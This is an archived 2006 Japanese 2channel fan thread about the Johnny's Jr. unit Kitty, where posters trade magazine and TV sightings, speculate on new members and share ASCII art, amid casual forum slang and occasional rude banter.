184 :ユーは名無しネ:2006/10/22(日) 21:15:18
ハリセンボンは処女コンビだから大目にみてやれ

185 :ユーは名無しネ:2006/10/22(日) 22:19:23
オムが食ってやれば良い

186 :ユーは名無しネ:2006/10/22(日) 23:29:58
http://busamoku.hp.infoseek.co.jp/cgi-bin/src/up1169.jpg
今日のEDのジャージ姿
子猫仲よさそうでキャワ

187 :ユーは名無しネ:2006/10/22(日) 23:39:44
>186
見れない

188 :ユーは名無しネ:2006/10/23(月) 00:38:28
>186
アドレスバーに直接貼ると見れる

189 :ユーは名無しネ:2006/10/23(月) 01:33:05
人稲
鑢スレもいないし急行も安置ばかりだしまともなのは海老氏スレだけ

190 :ユーは名無しネ:2006/10/23(月) 12:30:10
海老氏スレって興味ないもん

191 :ユーは名無しネ:2006/10/23(月) 16:26:31
夕立って今度放送いつ?

192 :ユーは名無しネ:2006/10/23(月) 17:45:40
来週はないよ

193 :ユーは名無しネ:2006/10/23(月) 18:29:05
>192
d
昼やらない変わりに深夜とかに放送するのかと思ってた

194 :ユーは名無しネ:2006/10/23(月) 18:48:09
たこやき人下品

195 :ユーは名無しネ:2006/10/23(月) 20:09:39
近代に子猫載ってるの?

196 :ユーは名無しネ:2006/10/23(月) 20:34:16
知らない
近くに近代ない

197 :ユーは名無しネ:2006/10/23(月) 20:36:50
>195
運動会レポと夕立の写真くらいだったとオモ

198 :ユーは名無しネ:2006/10/23(月) 21:09:30
ユーたち11月ゲスト

小川直や、関根努、西城秀樹


199 :ユーは名無しネ:2006/10/23(月) 21:11:10
>197
kittyと表記してあるの?

200 :ユーは名無しネ:2006/10/23(月) 21:15:35
>>199
うろ覚えだが子猫と表記してあったハズ
近代の運動会レポはウマーだとオモ

201 :ユーは名無しネ:2006/10/23(月) 22:19:48
200タソdです
取り寄せします

202 :ユーは名無しネ:2006/10/24(火) 13:45:13
ハッスルと秀樹イラネ

203 :ユーは名無しネ:2006/10/25(水) 18:14:00
ガイドかジョンに載ってた?

204 :ユーは名無しネ:2006/10/25(水) 19:16:28
載ってないとオモー

205 :ユーは名無しネ:2006/10/25(水) 22:01:03
dです

206 :ユーは名無しネ:2006/10/26(木) 10:41:55
2 名前:名無しさん@恐縮です :2006/10/26(木) 10:40:26 ID:R1f58hvQ0
2ゲトで子猫デブ


ゲイスポで2ゲトすると願いが叶うというジンクスに成功したああああああああ

207 :ユーは名無しネ:2006/10/26(木) 11:29:57
>206
乙!

208 :ユーは名無しネ:2006/10/27(金) 18:19:27
>206
このログ捨てずに持っとけよ
デブできたらその時一緒に祭ってやるから

209 :ユーは名無しネ:2006/10/28(土) 02:15:58
子猫ダイスチあげ

210 :ユーは名無しネ:2006/10/28(土) 06:20:25
子猫に選ばれなかった担の嫉妬が醜い

211 :ユーは名無しネ:2006/10/28(土) 13:38:50
ねー
異常だよね

212 :ユーは名無しネ:2006/10/28(土) 18:01:20
まぁ分からないでもないよ
子猫に入れなかった時点で年齢的にヤバイズニア沢山いるし

213 :ユーは名無しネ:2006/10/28(土) 22:59:49
実際自担が外されその新芽が選ばれればそりゃ自分だってちょっとは基地になるさ
ちょっとだけね

214 :ユーは名無しネ:2006/10/28(土) 23:25:53
☆子猫でーす☆

ヽ⊂*`∀´⊃ 人( -∀-)人(^∀^)人(ο^w^)ノ

215 :ユーは名無しネ:2006/10/29(日) 02:03:38
キャワユス

216 :ユーは名無しネ:2006/10/29(日) 09:49:41
プラムの手4本あるけど

217 :ユーは名無しネ:2006/10/29(日) 14:28:48
じゃ こう?

ヽ(*`∀´)人( -∀-)人(^∀^)人(ο^w^)ノ

218 :ユーは名無しネ:2006/10/29(日) 14:31:36
何でもいい

219 :ユーは名無しネ:2006/10/30(月) 03:55:39
子猫

220 :ユーは名無しネ:2006/10/30(月) 10:00:13
海老氏スレを上げてる同一安置

221 :ユーは名無しネ:2006/10/31(火) 00:29:01
片目誌内容に子猫の記載あり
久々の子猫だな

222 :ユーは名無しネ:2006/10/31(火) 09:13:15
本当だ
雑誌では子猫取り上げないのにね
他仁志はどうだろ
これは久々買おう

223 :ユーは名無しネ:2006/10/31(火) 14:03:46
⊂*`∀´⊃ヽ( -∀-)人(^∀^)人(ο^w^)ノ

これでヨロ

224 :ユーは名無しネ:2006/11/01(水) 01:03:39
先月は無かったからウレシス
4人ともキャラ立ちしてるのが良いよな(w

225 :ユーは名無しネ:2006/11/01(水) 19:37:55
w誌だけなのかな?P誌の予告にはなかった


226 :ユーは名無しネ:2006/11/02(木) 17:11:09
明日「2006ジャニーズ名曲集」だから子猫でFF歌いそう

227 :ユーは名無しネ:2006/11/02(木) 18:05:32
それはそれは
サイコーレートで録画だな

228 :ユーは名無しネ:2006/11/03(金) 13:38:39


229 :ユーは名無しネ:2006/11/03(金) 14:00:50
海老氏スレととりんスレ上げてるから子猫安置ですね

230 :ユーは名無しネ:2006/11/03(金) 21:29:43
子猫キャワすぎた
やはり子猫(・∀・)イイ!!

231 :ユーは名無しネ:2006/11/03(金) 22:00:13
子猫にヒラメ加入ktkr

232 :ユーは名無しネ:2006/11/03(金) 22:03:42
>231
イ ラ ネ

233 :ユーは名無しネ:2006/11/03(金) 22:10:09
子猫虫よりはヒラメでも良いと思った
みんなで肩組んで跳ねてる子猫キャワ

234 :ユーは名無しネ:2006/11/03(金) 22:18:06
まあ子猫+αはずっと言われてきたことだから
あんまり驚かネ

235 :ユーは名無しネ:2006/11/03(金) 22:20:46
ヒラメと子猫はいいね
あの5人はビズうpしてたよ
これで来年デブでいいじゃないの

236 :ユーは名無しネ:2006/11/03(金) 22:24:55
ヒラメ担必死でウザ

237 :ユーは名無しネ:2006/11/03(金) 22:27:23
サプライズはtでそ
Y2人じゃ子猫じゃ茄子

238 :ユーは名無しネ:2006/11/03(金) 22:29:45
ヤパ-リここでバトンの出番だな

239 :ユーは名無しネ:2006/11/03(金) 22:32:58
tにはつい子の前までタカキィと思ったけど百式見てあまりのブサさに驚いたやめた
tは玉が妥当

だけどたぶんヒラメが子猫入り確実

240 :ユーは名無しネ:2006/11/03(金) 22:34:22
子猫のヒラメはイラネ
鑢みたいにヒラメアゲアゲになっちゃうじゃんか

241 :ユーは名無しネ:2006/11/03(金) 22:36:15
ヒラメやっぱり入るか
あとは誰が入るかだが働き手とスタイルの良さで父さんくらいでいいかな

242 :ユーは名無しネ:2006/11/03(金) 22:37:35
>240
あーそれは大いに在り得るな
子猫は押し関係なく平等にオレオレ!映りが罷り通る稀なユニだった品

243 :ユーは名無しネ:2006/11/03(金) 22:38:43
玉は美形だがキャラがボミョンだから浮きそうだな

244 :ユーは名無しネ:2006/11/03(金) 22:40:06
>241
勘弁して
父さん入るくらいなら急行から一人入れるほうがマシ

245 :ユーは名無しネ:2006/11/03(金) 22:40:11
玉が子猫に入っても毛逝と若干被る上に禿という売りがないので埋没するだけ
これはキィにもいえた

246 :ユーは名無しネ:2006/11/03(金) 22:40:15
タモステ一緒に出ただけで子猫にヒラメ加入てpgr
厨ばっかり

247 :ユーは名無しネ:2006/11/03(金) 22:40:49
急行は弱いだろ
子猫の4人見てみろ

248 :ユーは名無しネ:2006/11/03(金) 22:41:36
>246
ヒラメ担の妄想

249 :ユーは名無しネ:2006/11/03(金) 22:41:48
4人の子猫がいいよ
ヒラメ居ても違和感なかったが扱いが・・・

250 :ユーは名無しネ:2006/11/03(金) 22:43:21
>246
加入の可能性が高くなったというだけだろ誰も加入とは思ってない
但しタモステは今後を予想するのに良い餌になるので皆が食いついてるだけ

251 :ユーは名無しネ:2006/11/03(金) 22:46:10
元々子猫4人に誰ぞ加入は予想してたから掃除機℃ーでもいいんだが
ただヒラメ加入によって一番予想される扱いに差が出るということについてはイヤだな

252 :ユーは名無しネ:2006/11/03(金) 22:47:20
もう子猫+鑢でいいよ

253 :ユーは名無しネ:2006/11/03(金) 22:49:10
>251
ネー
子猫は平等にアピしまくりがいいよね

254 :ユーは名無しネ:2006/11/03(金) 22:51:01
禿同

255 :ユーは名無しネ:2006/11/03(金) 22:55:04
子猫てアピって自分の場所を確保する弱肉強食が売りじゃなかったのか(w
ヲタもそれを楽しんでいたのに

256 :ユーは名無しネ:2006/11/03(金) 22:56:27
アピしまくっても和やかなキャワなふいんき(ryの子猫が好き

257 :ユーは名無しネ:2006/11/03(金) 22:56:28
ヒラメと虫を入れてY.Y.Kitty(ワイワイキティ)
どっかで聞いたことある響きだが(w

258 :ユーは名無しネ:2006/11/03(金) 22:58:22
>257
昔どっかで聞いたなー

259 :ユーは名無しネ:2006/11/03(金) 22:58:51
ヒラメ担は鑢スレに帰れ

260 :ユーは名無しネ:2006/11/03(金) 22:59:15
アハハハハー

261 :ユーは名無しネ:2006/11/03(金) 23:16:39
ワイワイキティて
なんか騒がしそうだな

262 :ユーは名無しネ:2006/11/03(金) 23:17:44
ワイワイキティバロスwwwwwwwwwwwwwwwwwwwwww

263 :ユーは名無しネ:2006/11/03(金) 23:18:43
木梨サイクルでキーホルダー買わないと
自担とオソロ

264 :ユーは名無しネ:2006/11/03(金) 23:29:07
⊂*`∀´⊃ヽ( -∀-)人(^∀^)人(ο^w^)ノ


265 :ユーは名無しネ:2006/11/03(金) 23:50:51
kittyにムリヤリいれるなら

K…北山
i…伊野尾
t…宏「太」
t…戸塚
y…八乙女

266 :ユーは名無しネ:2006/11/04(土) 00:10:20
それで決まり

キーホルダーは通販で買えますか?

267 :ユーは名無しネ:2006/11/04(土) 00:11:04
苺゚シンメが見れるならそれで
ヒラメは中心で棒立ちでもしてな

268 :ユーは名無しネ:2006/11/04(土) 00:41:15
ヒラメ担シツケー

269 :ユーは名無しネ:2006/11/04(土) 01:36:58
>256
今後の為に教えてやる
雰囲気はふんいきと読む
ふいんきジャナイ

270 :ユーは名無しネ:2006/11/04(土) 01:59:26
何か面白い人がいる

271 :ユーは名無しネ:2006/11/04(土) 01:59:59
>269
>269
>269

272 :ユーは名無しネ:2006/11/04(土) 02:00:21
>269
(゚д゚)ェェェェェェェェエエエ

273 :ユーは名無しネ:2006/11/04(土) 02:01:53
ふいんき(なぜか変換できない ぶち壊し

274 :ユーは名無しネ:2006/11/04(土) 02:02:23
子猫担って

275 :ユーは名無しネ:2006/11/04(土) 02:03:41
>269
今後の為に教えてやる
雰囲気はふんいきと読む
だがオマイは間違ってる

276 :ユーは名無しネ:2006/11/04(土) 02:29:36
>269の人気に嫉妬

277 :ユーは名無しネ:2006/11/04(土) 03:16:01
269はつりでそ?

278 :ユーは名無しネ:2006/11/04(土) 10:52:03
ふんいきと読むのはホントか?
ふいんきだと思ってた

279 :ユーは名無しネ:2006/11/04(土) 11:28:30
>278
自分の回りにもたくさんいるんだよね…ふいんきって読む人(w

280 :ユーは名無しネ:2006/11/04(土) 13:15:45
これは壮大な釣りだ
きっとそうだ

281 :ユーは名無しネ:2006/11/04(土) 15:01:02
ここはバカばっかかよ

282 :ユーは名無しネ:2006/11/04(土) 15:06:22
子猫担が常識ないヤシばっかだと思われるから
オマイら雰囲気ぐらいちゃんと読んでくれ

283 :ユーは名無しネ:2006/11/04(土) 15:21:56
つまんない釣りはやめれ

284 :ユーは名無しネ:2006/11/04(土) 19:21:43
波レポに欠いてあるよ
子猫のこと

285 :ユーは名無しネ:2006/11/04(土) 22:05:05
子猫担は壷深山あるいは壮大な釣り師の集まりなのですね

286 :ユーは名無しネ:2006/11/05(日) 10:39:47
子猫が早くデブしてくれないとここも中途半端だよな

それぞれのユニがあるからな

287 :ユーは名無しネ:2006/11/05(日) 14:16:54
しかしだからこそ比較的マターリ見守れるという

288 :ユーは名無しネ:2006/11/05(日) 19:57:01
毛逝スレ腐ってるorz

289 :ユーは名無しネ:2006/11/05(日) 23:17:34
酷いね毛逝スレ
毛逝タソはこっちに書けば
急行関係全てあらされてるっぽいね


290 :ユーは名無しネ:2006/11/05(日) 23:25:51
>288
子猫の個人は全員分ログだけ持ってたが毛逝スレ最近よく上がってるなーと思えば
まあがんがれ

291 :ユーは名無しネ:2006/11/05(日) 23:37:55
明日関西では3誌発売だよね
レポよろ
子猫載ってるんで

292 :ユーは名無しネ:2006/11/05(日) 23:50:40
まかしといて

293 :ユーは名無しネ:2006/11/06(月) 00:31:29
>292
よろしくです

294 :ユーは名無しネ:2006/11/06(月) 12:03:09
子猫記事誰か読んだ人いないかな

295 :ユーは名無しネ:2006/11/06(月) 12:43:23
http://para-site.net/up/data/15503.jpg
今月号の子猫
よかったら生地の内容教えて

296 :ユーは名無しネ:2006/11/06(月) 15:05:50
見開きで対談と>295の1Pで3P
トークは2段組で内容はこの4人での活動に慣れてきたということでダメだしなど
あとは夕立ちの話とかだったよ

297 :ユーは名無しネ:2006/11/06(月) 15:23:28
296タソd
三頁もあるのか
買いかな

298 :ユーは名無しネ:2006/11/06(月) 17:12:03
片目誌だけだったが対談面白かった
毛逝面白杉だろ
あとピンナップ付き

299 :ユーは名無しネ:2006/11/06(月) 17:20:03
kwsk教えて栗

300 :ユーは名無しネ:2006/11/06(月) 17:24:02
明日即効で本屋に逝き
自分で詠んだほうがウマーじゃまいか?(w

301 :ユーは名無しネ:2006/11/06(月) 17:25:37
ピンナップうp

302 :ユーは名無しネ:2006/11/06(月) 17:25:59
k→i→t→yの順でダメ出しされる
注目はプラムの若作りと毛逝の脇

303 :ユーは名無しネ:2006/11/06(月) 18:00:57
>301
http://www.uploda.org/uporg572523.jpg

304 :ユーは名無しネ:2006/11/06(月) 18:10:05
>302
d
若作りと脇気になるwww
>303
d
キャワ!

305 :ユーは名無しネ:2006/11/06(月) 18:59:16
>303
それ実物見たときオモタがプラムおちょこ口でブリッ子だな
若作り無理スンナって

306 :ユーは名無しネ:2006/11/06(月) 19:17:37
>303
見れないorz

307 :ユーは名無しネ:2006/11/06(月) 19:45:50
ジャニーズJr. ザ・少年倶楽部(トーク)
※出演者は未定です。 NHK BS-2
(東京) 11月19日 11月21日 11月22日(水)
17:00予定



子猫クリスマスSPktkr


308 :ユーは名無しネ:2006/11/06(月) 20:19:03
毛逝がまた何かやらかしたの?
脇がどうしたんだ?

309 :ユーは名無しネ:2006/11/06(月) 20:32:45
片目誌子猫載ってたね良かった

310 :ユーは名無しネ:2006/11/06(月) 22:56:13
>307
どこに載ってんの?

311 :ユーは名無しネ:2006/11/06(月) 23:50:57
毛逝はステップうpするならヤパーリ子猫のほうがいいんじゃね
対談読んでオモタ

312 :ユーは名無しネ:2006/11/07(火) 00:24:45
>108
凸は毛逝に脇をしめるマイク(notの持ち方を直して欲しいらしく
「これからは脇毛アピの方向でお願いします」とか言ってたww

313 :ユーは名無しネ:2006/11/07(火) 00:42:07
凸は本当にカコヨクなったなー
キャワ系に精悍さが加わってイイ!

314 :ユーは名無しネ:2006/11/07(火) 00:46:38
苺カコイイ

315 :ユーは名無しネ:2006/11/07(火) 01:11:27
FF振り付けでも脇を見せなかったのに
毛逝の衣装を変えてやれというレスもあった(w

316 :ユーは名無しネ:2006/11/07(火) 14:28:42
何で脇に拘ってるんだ?


317 :ユーは名無しネ:2006/11/07(火) 15:51:47
毛逝の脇は凸の勝手なこだわりだろ
それにしても片目誌の対談面白い

318 :ユーは名無しネ:2006/11/07(火) 18:36:27
毛逝の脇に注目して対談したことが面白かったわけよ
ネラとして捨て置けなかった

319 :ユーは名無しネ:2006/11/07(火) 20:34:52
何で凸は脇に拘ってるんだろう

320 :ユーは名無しネ:2006/11/08(水) 01:07:17
319は読解力なさ杉

321 :ユーは名無しネ:2006/11/08(水) 17:05:32
子猫の対談軽く毒はきすぎwww
1番弱そうなのがプラムみたいな

322 :ユーは名無しネ:2006/11/10(金) 23:43:35
夕立たこやきでやらないの?

323 :ユーは名無しネ:2006/11/10(金) 23:55:32
やるわけねーだろ
たこやきには映像売らないってさ

324 :ユーは名無しネ:2006/11/11(土) 00:29:28
売ればいいのに

325 :ユーは名無しネ:2006/11/11(土) 00:32:28
夕立見れないとか
ここの住民はうpトラッカーも知らない深山ばかりなのかorz

326 :ユーは名無しネ:2006/11/11(土) 03:04:19
自分は知ってるよ
地方住みの自分にとって神

327 :ユーは名無しネ:2006/11/11(土) 13:29:11
>325
違法サイトの話を堂々とするおまいもな

328 :ユーは名無しネ:2006/11/12(日) 19:05:02
子猫メドレー最高

329 :ユーは名無しネ:2006/11/12(日) 19:46:59
毛逝が急行として歌ってたから苺→子猫に続くまで気付かなかった(w
でも衣装揃えてクレー

330 :ユーは名無しネ:2006/11/13(月) 12:55:23
衣装そろってないのが子猫クオリティ-だとオモーが

331 :ユーは名無しネ:2006/11/14(火) 22:44:57
子猫で今年中にまたタモステ出ないかな
来週の少蔵の子猫楽しみ

332 :ユーは名無しネ:2006/11/16(木) 17:45:02
子猫歌藁出るの?

333 :ユーは名無しネ:2006/11/17(金) 09:12:39
苺だけ入ったって事は子猫でしょ

334 :ユーは名無しネ:2006/11/17(金) 16:51:25
コネ コ

335 :ユーは名無しネ:2006/11/17(金) 21:20:27
クロネコ

336 :ユーは名無しネ:2006/11/18(土) 00:55:31
深山じゃないがうpトラッカーってなに?

337 :ユーは名無しネ:2006/11/19(日) 13:01:23
今日からリニュしてED子猫メインでウマー
大画面でスタジオだしフライハイ良すぎた

338 :ユーは名無しネ:2006/11/19(日) 15:11:17
どこが大画面

339 :ユーは名無しネ:2006/11/19(日) 15:41:13
11/11収録(二回分)

11/19,25放送(新ED)


340 :ユーは名無しネ:2006/11/19(日) 22:08:12
子猫担は自分だけですかそうですか

341 :ユーは名無しネ:2006/11/20(月) 23:14:58
片目誌でダメ出しされた毛逝マイクの持ち方変わってたよ
前ほどオカマ持ちじゃなかった


342 :ユーは名無しネ:2006/11/21(火) 07:24:07
女性自身に子猫載ってるみたいだよ。
新聞の見出しに広告でてた。8ページもあるらしい

343 :ユーは名無しネ:2006/11/21(火) 08:16:08
女性自身買ったよ
子猫カラーで3ページ
他に運動会の写真もあり。絶対買ったほうがいい

344 :ユーは名無しネ:2006/11/21(火) 09:10:22
自分も買ってきた
期待以上の子猫祭だった

345 :ユーは名無しネ:2006/11/21(火) 10:25:00
女性自身買うぞぉぉぉぉぉ
買ったらまた報告するノシ

346 :ユーは名無しネ:2006/11/21(火) 14:00:12
女性自身パックされてた(たぶん立ち読み防止)
ジャニーズとか書いてあってスゴイ気になってたんだ 皆dクス!
買ってこよう

347 :ユーは名無しネ:2006/11/21(火) 14:45:23
新聞の見出しも子猫写真だったから期待してたけど
うれしすぎる内容だった

348 :ユーは名無しネ:2006/11/21(火) 14:48:05
子猫スゴスだおね
あれにはビクーリ
完全保存ばんだよ

349 :ユーは名無しネ:2006/11/21(火) 20:20:59
>>341
あの持ち方の隠れファンだったのにorz

350 :ユーは名無しネ:2006/11/22(水) 01:30:39
女性自身を見るためにかーちゃんの逝ってる近所のパーマ屋に行ってくるノシ

351 :ユーは名無しネ:2006/11/22(水) 13:36:26
近代に子猫載ってるよぉ
2ページ載ってたよぉ

352 :ユーは名無しネ:2006/11/22(水) 13:46:34
>351
そのまま氏ね

353 :ユーは名無しネ:2006/11/22(水) 20:01:16
>351
情報dです

354 :ユーは名無しネ:2006/11/23(木) 14:48:45
Fli highってテゴマスで有名になったスェーデン制作したって聞いたんだけど
本当なの?

355 :ユーは名無しネ:2006/11/23(木) 15:41:46
>354
ホント
見てみ名前

カレンダーって子猫メインなのか?

356 :ユーは名無しネ:2006/11/23(木) 16:52:02
子猫ってダレなのかな?

357 :ユーは名無しネ:2006/11/23(木) 18:34:30
小猿
子豚
小河童
グルメリポーター

358 :ユーは名無しネ:2006/11/23(木) 20:00:07
>357
(; ・´д・`)

359 :ユーは名無しネ:2006/11/23(木) 20:59:39
来年のデブ目指してガンガレ!

360 :ユーは名無しネ:2006/11/25(土) 15:45:51
⊂*`∀´⊃ ブヒッ ブヒッ ブブブ
( -∀-) カッパッパー ルンパッパー
( ^∀^) ペルシャジュウタンヤー
(ο^w^) ウキキッ ウキキキキッ ウキッ

361 :ユーは名無しネ:2006/11/26(日) 00:03:57
あげ

362 :ユーは名無しネ:2006/11/26(日) 01:01:41
>360
天使時代の毛逝タソキテタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。. .。.:*・゜゚・*

363 :ユーは名無しネ:2006/11/26(日) 01:35:37
>360
キャワロス

364 :ユーは名無しネ:2006/11/26(日) 12:49:29
ユー

365 :ユーは名無しネ:2006/11/26(日) 14:42:24
Kis-My-Ft2の北山宏光、
J.J.Expressの伊野尾慧、
A.B.C.の戸塚祥太、
Ya-Ya-yahの八乙女光の4人で結成されたグループ
期間限定ユニットのはずなのに今だに活動している

これでわかりましたか?
皆さんスルーして下さい
何も言わないで下さい
失礼しました

366 :ユーは名無しネ:2006/11/26(日) 14:43:34
あっ、ユニット名は全員の頭文字から
その順に名前を書きました

367 :ユーは名無しネ:2006/11/26(日) 14:43:35
期間限定ユニは子猫事務であって
子猫は期間限定じゃないだろ

368 :ユーは名無しネ:2006/11/26(日) 14:54:26
今更何言ってんだって感じだよね
子猫は実際活動続いてるんだから
それが現実なのに

369 :ユーは名無しネ:2006/11/27(月) 01:29:35
>360
バロスだが可愛いぞオイ

370 :ユーは名無しネ:2006/11/27(月) 13:01:58

期間限定は子猫事務

371 :ユーは名無しネ:2006/11/27(月) 21:11:09
北山の本スレです



主税【5】
http://tv7.2ch.net/test/read.cgi/jr2/1164628119/

372 :ユーは名無しネ:2006/11/27(月) 22:19:42
http://0bbs.jp/zatudandao/img0_3824

これ何の雑誌に載ってたかオセーテ

373 :ユーは名無しネ:2006/11/27(月) 22:41:42
>372
自身

374 :ユーは名無しネ:2006/11/30(木) 00:57:22
w誌来月号子猫で載るよ
結成半年後を振り返るって
やはり来年も継続するね

375 :ユーは名無しネ:2006/12/01(金) 22:01:59
wwwwwwwwwwwwwwwwwwwwwwww

376 :ユーは名無しネ:2006/12/01(金) 22:33:46
>373
d

377 :ユーは名無しネ:2006/12/02(土) 10:40:38
>374
dd

378 :ユーは名無しネ:2006/12/03(日) 13:26:34
えー

379 :ユーは名無しネ:2006/12/06(水) 11:34:25
子猫3nのレポお願い

380 :ユーは名無しネ:2006/12/06(水) 19:48:19
見てないのかな
一応あげます

381 :ユーは名無しネ:2006/12/06(水) 21:33:27
買ったけどまだ読んでない

382 :ユーは名無しネ:2006/12/06(水) 22:50:59
子猫載ってたのは片目誌のみ3P対談(内容は>374の通り)
白いツリーと一緒に撮影
対談には何故か斗が参戦(w

383 :ユーは名無しネ:2006/12/06(水) 22:55:32
斗?斗?斗?
いらないよね

384 :ユーは名無しネ:2006/12/06(水) 23:19:21
工エエェェ(´д`)ェェエエ工工
斗?
何で斗が・・子猫とは関係ないから貴重な対談をorz

385 :ユーは名無しネ:2006/12/06(水) 23:20:15
じゃ今回他人がいるからおもしろいネタはなしですか

386 :ユーは名無しネ:2006/12/06(水) 23:22:52
ぜんぜん絡みない人をなぜ入れたんだ?
喋りにくいだろうな子猫も

387 :ユーは名無しネ:2006/12/06(水) 23:25:50
子猫に斗が加入ってことはないよね

388 :ユーは名無しネ:2006/12/06(水) 23:34:09
なんで斗なんだろう
Pなら分かるけど
斗は衝撃出るから魔と対談すればいいのに


389 :ユーは名無しネ:2006/12/06(水) 23:36:24
>382だけどスマソ
斗についてkwsk書くと
斗が対談にいたのは同スタジオで同じテーブルにいたからラスィ
子猫の余ってるtは斗くんだった〜から始まった対談
その後いなくなったと思ってたら途中対談に参加してる斗
プラムとPが同級生だよねと話題を振る
子猫面がPくんのこと掴みきれないとの発言にPのことわかってるのは俺発言
とりあえず斗が子猫加入とかじゃナス

子猫の対談はバリボ遠征で仲良くなって大冒険でもっと仲良くなった
ホテルでみんなでルームサービスとってマイボス見たとか子猫はケミストリーなどですた


390 :ユーは名無しネ:2006/12/07(木) 00:05:56
>389
kwsk内容dです
そういういきさつでしたか
埋没みんなで見てたなんて自分も見てたドラマだから照れるな(*´∀`*)
子猫がケミってどういう意味なのかな?

391 :ユーは名無しネ:2006/12/07(木) 02:23:14
>389
そういうことか
でも斗とのその絡み
なんか斗セツナスだな

392 :ユーは名無しネ:2006/12/07(木) 16:40:06
アンチみたい

393 :ユーは名無しネ:2006/12/09(土) 01:03:47
安置だよ

394 :ユーは名無しネ:2006/12/10(日) 01:44:52
あげ

395 :ユーは名無しネ:2006/12/11(月) 18:56:00
802:ユーは名無しネ :2006/12/09(土) 22:20:53
マハ極秘情報ハマ

J-White
とっつ→
がや
しょぉん
やぶ
ぃのぉ
せんが

J-Black
きたゃま
なかま
かわぃ
たかき
ひかる
にか

396 :ユーは名無しネ:2006/12/11(月) 23:29:33
子猫デブすれば解決

397 :ユーは名無しネ:2006/12/11(月) 23:41:26
最近自ユニより子猫のほうがスチだorz

398 :ユーは名無しネ:2006/12/11(月) 23:57:42
>397
ノシ
凹むことナス
自分子猫一本になってくれてもいいとすら思ってる

399 :ユーは名無しネ:2006/12/12(火) 08:04:02
>397>398イヤン
そんな姐さん達は海老氏担と予想

400 :ユーは名無しネ:2006/12/12(火) 20:22:21
子猫でまた雑誌撮ったみたいだよ今日

401 :ユーは名無しネ:2006/12/12(火) 23:00:36
>400
来月もか
毎月載るのは嬉しいな

402 :ユーは名無しネ:2006/12/12(火) 23:32:22
>399
毛逝担かもですよ

凸担の確率→49%
毛逝担の確率→40%
プラム担の確率→10%
苺担の確率→1%

403 :ユーは名無しネ:2006/12/13(水) 02:19:09
ん?

404 :ユーは名無しネ:2006/12/13(水) 02:44:26
自ユニより子猫麺のがマシ

405 :ユーは名無しネ:2006/12/13(水) 02:47:39
子猫

406 :ユーは名無しネ:2006/12/13(水) 20:22:37
子猫より子犬の方がよかと

407 :ユーは名無しネ:2006/12/14(木) 17:28:34
>399
残念ながら凸担ではナス

408 :ユーは名無しネ:2006/12/15(金) 16:10:08
>407
ジヌンはブタム担と予想

409 :ユーは名無しネ:2006/12/15(金) 20:30:31
>408
ここは壷ですよ

410 :ユーは名無しネ:2006/12/15(金) 22:40:10
子猫好きだけどこの4人だと華がナス
ゴルマイorJrの誰かついてデブかな

411 :ユーは名無しネ:2006/12/15(金) 23:08:49
4人で良い
4人が最高

412 :ユーは名無しネ:2006/12/15(金) 23:25:31
鑢+アリーキセルハシーでデブだよ(w

413 :ユーは名無しネ:2006/12/15(金) 23:27:01
>412
どんだけ妄想担

414 :ユーは名無しネ:2006/12/19(火) 23:32:56
近代は

415 :ユーは名無しネ:2006/12/20(水) 11:08:50
近代載ってないのか

416 :ユーは名無しネ:2006/12/23(土) 16:10:59
きてぃ

417 :ユーは名無しネ:2006/12/23(土) 19:04:07
http://blog.m.livedoor.jp/zutto_news8_1/index.cgi

iの自称チャソ

418 :ユーは名無しネ:2006/12/27(水) 17:29:13
宣伝死ね

419 :ユーは名無しネ:2006/12/28(木) 00:03:53
子猫+ヒラメでいいと思うの

420 :ユーは名無しネ:2006/12/29(金) 00:36:54
>419
奇声ヒラメイラネ

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)